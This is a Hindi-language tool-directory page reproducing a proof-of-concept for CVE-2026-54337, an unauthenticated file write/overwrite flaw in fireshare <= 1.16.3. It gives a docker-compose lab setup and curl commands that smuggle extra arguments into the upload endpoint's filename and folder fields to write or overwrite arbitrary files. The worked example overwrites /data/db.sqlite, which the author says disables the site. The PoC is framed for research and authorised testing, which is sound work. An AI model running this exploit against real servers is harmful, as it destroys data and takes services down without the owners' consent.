Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - fireshare <= 1.16.3 के लिए बिना प्रमाणीकरण के फ़ाइल लेखन/अधिलेखन PoC

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-54337 PoC

CVE-2026-54337 - fireshare में बिना प्रमाणीकरण के फ़ाइल लेखन/अधिलेखन (<= 1.16.3) PoC

अधिक जानकारी के लिए कृपया इस Github सलाहकार देखें

सेटअप

  • कृपया परीक्षण के लिए निम्नलिखित docker-compose.yml का उपयोग करें
root@kitploit:~
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Ephemeral storage (discarded when container stops)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

शोषण

  • चरण 1: जब तक आप फ़ाइल को .mp4 एक्सटेंशन के साथ नाम देते हैं, तब तक कोई भी फ़ाइल बनाएं, उदाहरण के लिए
root@kitploit:~
$ echo 123 > test.mp4
  • चरण 2: निम्नलिखित curl कमांड चलाएं (प्लेसहोल्डर को बदलना सुनिश्चित करें
root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

उदाहरण के लिए, /data/db.sqlite को अधिलेखित करने के लिए आप कमांड को निम्नानुसार बदलेंगे

root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

नोट

  • चूंकि डिफ़ॉल्ट रूप से, सेवा nginx उपयोगकर्ता के तहत चलती है, जिसकी केवल /data, /processed, /images और /videos तक पहुंच है, इसलिए आप केवल वहीं लिख/अधिलेखित कर सकते हैं
  • इस कारण मेरी राय में, /data/db.sqlite को अधिलेखित करने का सबसे अधिक प्रभाव होता है क्योंकि यह वेबसाइट को अनुपयोगी बना देगा

अस्वीकरण

  • यह proof-of-concept (PoC) केवल शैक्षिक, अनुसंधान और रक्षात्मक सुरक्षा उद्देश्यों के लिए प्रदान किया गया है।
  • लेखक इस कोड के उपयोग से होने वाले किसी भी दुरुपयोग, क्षति, अनधिकृत पहुंच, सेवा व्यवधान, डेटा हानि, या कानूनी परिणामों के लिए जिम्मेदार नहीं है। उपयोगकर्ता इस PoC का उपयोग करने से पहले सभी लागू कानूनों, विनियमों और प्राधिकरण आवश्यकताओं का अनुपालन सुनिश्चित करने के लिए पूरी तरह से जिम्मेदार हैं।
  • यह PoC केवल उन प्रणालियों के विरुद्ध निष्पादित किया जाना चाहिए जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है। सिस्टम का अनधिकृत परीक्षण अवैध और अनैतिक हो सकता है।
  • इस सॉफ़्टवेयर का उपयोग करके, आप स्वीकार करते हैं कि आप इसे अपने जोखिम पर कर रहे हैं।
टूल डाउनलोड करें